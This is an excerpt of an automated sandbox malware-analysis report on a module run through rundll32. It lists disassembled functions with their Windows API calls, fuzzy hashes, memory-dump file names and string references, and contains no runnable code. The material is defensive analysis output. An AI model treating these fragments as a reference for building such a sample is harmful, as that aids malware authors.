                                                                              • Instruction ID: 989ffcfb0bb56b08acc8eaef6e08d21419a749952b09db26feaec72953a257e2
                                                                              • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction Fuzzy Hash: BAE0ED72A003509BDB10DE58D8C4A5737E4AF08655F044595FD14DF34BF371E91087D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,0484AD80,00000000,0484ADE0), ref: 04655811
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory
                                                                              • String ID:
                                                                              • API String ID: 4241100979-0
                                                                              • Opcode ID: d8d0ff34f32125d42050a8512575aac9235832b3353a8fe2d85864a225ec7fcb
                                                                              • Instruction ID: 63d7bfbc5c1860137f6ee541168bac25c2796b9b79ad2dbf5013b00706b389f3
                                                                              • Opcode Fuzzy Hash: d8d0ff34f32125d42050a8512575aac9235832b3353a8fe2d85864a225ec7fcb
                                                                              • Instruction Fuzzy Hash: 30B092927502802AFF0035F91CC1B2E008C9B5440EF100939F151C6281F86BD8451014
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 04639D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                              • Instruction ID: d7e50b0dedc0805b0284579be2bdb447d230788bb6f5b11f347ef10d58d43a51
                                                                              • Opcode Fuzzy Hash: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                              • Instruction Fuzzy Hash: D8B012E4708BC230FA2064319D02736004D0B21743FC4011A6C27C11C0FA81F0099879
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 31276548-0
                                                                              • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction ID: 1b3ea24b5179ded1c31d2853cfcaee1492389d48cf83ff61bbe7eaa92c62ef24
                                                                              • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction Fuzzy Hash: CCA012144085001AC444E7186C4240F31801941015FC40714685DA6281F605D56403DB
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,04635C63), ref: 04635663
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 0358b9d3f298cceea8c612dc583beb11e1318f24492ac52ba1a6f327c4d85c93
                                                                              • Instruction ID: 85cdf13314dfd4dcd749b399205de07bb15a7a4717362d8f8bd63f6a1c304600
                                                                              • Opcode Fuzzy Hash: 0358b9d3f298cceea8c612dc583beb11e1318f24492ac52ba1a6f327c4d85c93
                                                                              • Instruction Fuzzy Hash: 30F0AFF2B013019FE7549F78AA487467BD5E704396F10463EE90ADB789E7B49C418784
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 046357A7
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 046357CA
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 046357D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Free$Query
                                                                              • String ID:
                                                                              • API String ID: 778034434-0
                                                                              • Opcode ID: a51fbdc1f41f3635193ee000f3d4045f8b36ea77ddc743b9d4aec4bd80984ab7
                                                                              • Instruction ID: 9263d707a69a92d0ae5b0dd60b034c2f648352e5a8be95e8ad8969662c636b93
                                                                              • Opcode Fuzzy Hash: a51fbdc1f41f3635193ee000f3d4045f8b36ea77ddc743b9d4aec4bd80984ab7
                                                                              • Instruction Fuzzy Hash: 71F0AF34705640AFD311DB29C884B1BB7F5EFC9251F15C668E9898B3A0E731EC028B96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0463CE35
                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0463CE46
                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0463CF46
                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0463CF58
                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0463CF64
                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0463CFA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                              • API String ID: 1930782624-3908791685
                                                                              • Opcode ID: fb585dabb97f9fddcca49dd36e54efbc2bb4c052337462b2d0225d09279cc242
                                                                              • Instruction ID: bc6302d9eedcf80c6d4f5ddbe0a42994c02bbccb3b7031624d2f64d6a8776571
                                                                              • Opcode Fuzzy Hash: fb585dabb97f9fddcca49dd36e54efbc2bb4c052337462b2d0225d09279cc242
                                                                              • Instruction Fuzzy Hash: 70419E33E006989BDB10DEA8CC84ADEB3B5AF44316F1485A9F505B3240FB74BE41DA85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0480AD02
                                                                              • IsIconic.USER32(?), ref: 0480AD30
                                                                              • IsWindowVisible.USER32(?), ref: 0480AD40
                                                                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,04818063,?,048671C0), ref: 0480AD5D
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0480AD70
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0480AD81
                                                                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,04818063,?,048671C0), ref: 0480ADA1
                                                                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,04818063,?,048671C0), ref: 0480ADAB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongShow$IconicVisible
                                                                              • String ID:
                                                                              • API String ID: 3484284227-0
                                                                              • Opcode ID: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction ID: 2fe15c646f22276aafb7d0fe8fca794d39f7fedd5bfb6d095f4271182e9facb4
                                                                              • Opcode Fuzzy Hash: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction Fuzzy Hash: 40112B4266E79039EB2632291C00FEF39D84FE3326F18CF2DF9C5D11C1E658A145826B
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLogicalDriveStringsW.KERNEL32(00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002,00000000,00000001,00000000), ref: 04652D59
                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000104,00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002), ref: 04652D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DeviceDriveLogicalQueryStrings
                                                                              • String ID:
                                                                              • API String ID: 3173366581-0
                                                                              • Opcode ID: bf7dda7c3cc92f7087c1eecf5b5b54f7e1c04be3aa7f2f3df12306b651a8f5f9
                                                                              • Instruction ID: 120347eb88c0efcd197b013980e51113a6d61cdebf4c2ba119fa7bf64deb1749
                                                                              • Opcode Fuzzy Hash: bf7dda7c3cc92f7087c1eecf5b5b54f7e1c04be3aa7f2f3df12306b651a8f5f9
                                                                              • Instruction Fuzzy Hash: C63150B1A002189BEB25DF64C891A9DB3F9EF48714F5141EAE905A7350FB30FE448F98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(PSAPI.dll,00000000,04646631,00000000,?,00000000,?,0465309E,00000104,00000000,046530F2,?,000003EE,00000004,00000000,00000000), ref: 04646158
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                                                              • API String ID: 1029625771-2267155864
                                                                              • Opcode ID: 6ac8aa50136cf0b09242b700a151b7ddf0239615d3b5adc0797d37234f00b152
                                                                              • Instruction ID: 65be5b998383783f264fe8a206f4ce32d7976d16cfbaa7465fe73577a3ffbf43
                                                                              • Opcode Fuzzy Hash: 6ac8aa50136cf0b09242b700a151b7ddf0239615d3b5adc0797d37234f00b152
                                                                              • Instruction Fuzzy Hash: 354130B0A41760DFFF40DFB4F986E1A37A9EB97A087405965E410CF204FA78E9418F99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 04638739
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0463873F
                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04638752
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 0463875B
                                                                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,046387D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04638786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                              • API String ID: 1184211438-79381301
                                                                              • Opcode ID: 460ad1bd45dd97aa2ceb0f826e45d00e7e6ea1f4f8d1e740aec50b8678b0b746
                                                                              • Instruction ID: bbd9d61d187992843cdaa453ed8d7aef624aeabca02b1e949b12e9b033fbf04e
                                                                              • Opcode Fuzzy Hash: 460ad1bd45dd97aa2ceb0f826e45d00e7e6ea1f4f8d1e740aec50b8678b0b746
                                                                              • Instruction Fuzzy Hash: D4116D70D00288BFEB10EBA6C844AADB7F6EF4030AF108499E80493640F778BA848B55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 046658A5
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 046658C1
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 046658FA
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04665977
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04665990
                                                                              • VariantCopy.OLEAUT32(?), ref: 046659C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-3916222277
                                                                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction ID: 5ff0b21a75389cd73979faa8a076801aa975c8ab1034e53edcf5a80fb36122ee
                                                                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction Fuzzy Hash: 9D510B75900229AFDB22DF58DD80BD9B7FCAF49214F0041D9E50AA7301EA70BF858F69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCapture.USER32 ref: 04817AC6
                                                                              • IsWindowUnicode.USER32(00000000), ref: 04817B09
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04817B24
                                                                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 04817B43
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04817B52
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 04817B63
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04817B83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                              • String ID:
                                                                              • API String ID: 1994056952-0
                                                                              • Opcode ID: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction ID: 08d7de95b51012cbb895e2d9997f3e17c59116b7595f6ab72233d4ecae35ff25
                                                                              • Opcode Fuzzy Hash: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction Fuzzy Hash: D6217C75204608AFBB60FA98CD40F6B73DCDF48264B144E2EEA5AC7261EB20F8408764
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
